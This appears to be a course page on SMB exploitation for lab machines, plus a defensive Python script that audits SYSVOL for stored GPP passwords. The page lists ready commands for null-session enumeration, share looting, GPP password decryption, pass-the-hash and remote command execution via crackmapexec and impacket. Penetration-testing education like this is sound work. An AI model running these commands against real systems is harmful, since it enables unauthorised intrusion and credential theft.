⭐ Premium Path · Protocol Exploitation

SMB Exploitation Mastery

Two modules. Null sessions to domain compromise. From listing shares without credentials to decrypting a GPP password out of SYSVOL — practised against live machines, not screenshots.

2 Modules · 3 Machines · Premium

The SMB Attack Methodology

Four phases from first probe to domain controller compromise.

Phase 1 — Discovery

SMB runs on TCP 139 and 445. Identify the service, OS version, domain membership, and signing status in one scan.

nmap -sS -p 139,445 -sV \
  --script smb-os-discovery TARGET

Phase 2 — Null Session Enum

Before using any credentials, extract everything available to unauthenticated sessions: shares, users, password policy.

enum4linux-ng -A TARGET
smbclient -L //TARGET -N
crackmapexec smb TARGET

Phase 3 — Share Content Analysis

Download accessible share contents. Configuration files, backup archives, and scripts routinely contain credential material.

smbmap -H TARGET
smbclient //TARGET/SHARE -N
smb> mget *

Phase 4 — SYSVOL & Domain Exploitation

On domain controllers, walk SYSVOL for Groups.xml files. Decrypt GPP passwords with one command — then own the DC.

smbclient //TARGET/SYSVOL -N
# find Groups.xml → extract cpassword
gpp-decrypt <cpassword>
crackmapexec smb TARGET \
  -u USER -p PASS -x 'whoami'

The Two Modules

Complete Module 1 before Module 2. Each module has structured per-lab assignments.

Module 1 · 📂

SMB — Share Enumeration & Null Sessions

SMB is the most information-rich protocol on any Windows or Samba network. A single null session can reveal share names, usernames, password policies, and OS version — without a single credential. Master the tools and outputs before touching a password.

  • smbclient -L //TARGET -N (null session share list)
  • enum4linux -a TARGET (full automated null-session dump)
  • enum4linux-ng -A TARGET (modern Python rewrite, cleaner output)
  • crackmapexec smb TARGET (quick status, OS, signing, guest session)
  • nmap --script smb-enum-shares,smb-enum-users,smb-os-discovery TARGET
  • rpcclient -U '' -N TARGET → enumdomusers / querydominfo / srvinfo
  • Reading share permissions: READ vs WRITE, ACL inheritance, NETLOGON/SYSVOL presence
  • smbclient //TARGET/SHARE -N → ls → mget * (recursive share download)
Tools: smbclient, enum4linux, enum4linux-ng, crackmapexec, nmap, rpcclient

Hands-on assignments for this module are available to Premium members.

Module 2 · 🗝️

SMB — SYSVOL, GPP & Domain Credential Harvest

Group Policy Preferences encrypt stored passwords with a static AES key that Microsoft itself published in 2012 (MS14-025). Any domain user can read SYSVOL, so any attacker can decrypt the password with one command. This is not a theoretical risk: it still appears in modern environments.

  • Enumerating SYSVOL: smbclient //TARGET/SYSVOL -U DOMAIN/user%pass
  • Locating Groups.xml: find . -name Groups.xml 2>/dev/null
  • Extracting cpassword from Groups.xml (base64-encoded AES-256 blob)
  • Decrypting with gpp-decrypt: gpp-decrypt <cpassword>
  • CrackMapExec GPP auto-discovery: crackmapexec smb TARGET -u USER -p PASS -M gpp_password
  • Metasploit: post/multi/recon/local_exploit_suggester + auxiliary/scanner/smb/smb_ms17_010
  • Pass-the-Hash with crackmapexec: --hash LMHASH:NTHASH
  • impacket psexec.py / smbexec.py for remote command execution over SMB
Tools: smbclient, gpp-decrypt, crackmapexec, impacket, metasploit
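As an added, defender-side example (not course material and not one of the tools listed above): a Python audit that walks a copy of SYSVOL and reports every GPP XML element that still carries a cpassword attribute, without decrypting anything. It generalises beyond Groups.xml to the other GPP file types that use cpassword; the directory layout, GUIDs and cpassword value in the embedded sample are constructed placeholders.

```python
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

# GPP preference files that can embed a cpassword attribute (Groups.xml is the common one).
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}
# Constructed sample in the Groups.xml layout; GUIDs and cpassword are placeholders.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{CONSTRUCTED-CLSID}">
  <User clsid="{CONSTRUCTED-CLSID}" name="LocalAdmin" uid="{CONSTRUCTED-UID}">
    <Properties action="U" cpassword="CONSTRUCTED_BASE64_BLOB=="
                userName="LocalAdmin" changeLogon="0" neverExpires="1"/>
  </User>
</Groups>
"""
# A constructed preference file with no stored password: must not be flagged.
SAMPLE_DRIVES_XML = """<?xml version="1.0" encoding="utf-8"?>
<Drives clsid="{CONSTRUCTED-CLSID}">
  <Drive name="H:"><Properties action="U" path="\\\\fileserver\\home"/></Drive>
</Drives>
"""

def audit_sysvol(sysvol_root):
    """Walk SYSVOL, return one finding per element that carries cpassword."""
    findings = []
    for path in Path(sysvol_root).rglob("*.xml"):
        if path.name not in GPP_FILES:
            continue
        try:
            root = ET.parse(path).getroot()
        except ET.ParseError as err:  # a corrupt GPP file is worth reporting too
            findings.append({"file": str(path), "error": str(err)})
            continue
        for elem in root.iter():
            if "cpassword" in elem.attrib:
                findings.append({"file": str(path), "element": elem.tag,
                                 "user_name": elem.attrib.get("userName", ""),
                                 # empty cpassword means the password was cleared
                                 "has_secret": bool(elem.attrib["cpassword"])})
    return findings

def run_demo():
    """Build the constructed SYSVOL tree in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp, "Policies", "{CONSTRUCTED-GPO-GUID}", "Machine", "Preferences")
        for sub, text in (("Groups", SAMPLE_GROUPS_XML), ("Drives", SAMPLE_DRIVES_XML)):
            (base / sub).mkdir(parents=True)
            (base / sub / f"{sub}.xml").write_text(text)
        return audit_sysvol(tmp)
```

Point audit_sysvol at a mounted or copied SYSVOL root to get the same findings for a real domain; run_demo only exercises the constructed sample.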